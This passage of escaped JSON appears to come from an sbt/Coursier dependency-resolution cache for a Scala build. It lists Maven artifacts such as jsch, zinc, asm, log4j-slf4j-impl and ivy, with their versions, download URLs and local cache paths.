",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.jcraft\",\"name\":\"jsch\",\"revision\":\"0.1.54\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsch\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.jcraft.com/jsch/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-scripted_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-scripted_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-cache_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-cache_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-slf4j-impl\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-slf4j-impl\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna-platform\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna-platform\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"jline\",\"name\":\"jline\",\"revision\":\"2.14.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jline\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbt\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"protocol_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protocol_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-parser-combinators_2.12\",\"revision\":\"1.1.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-parser-combinators_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-caffeine_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-caffeine_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ivy\",\"name\":\"ivy\",\"revision\":\"2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ivy\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ivy\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"logic_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"logic_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ipcsocket\",\"name\":\"ipcsocket\",\"revision\":\"1.0.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ipcsocket\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ipcsocket\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-persist_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-persist_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"shaded-scalajson_2.12\",\"revision\":\"1.0.0-M4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"shaded-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/mdedetrich/scalajson\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"collections_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"collections_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\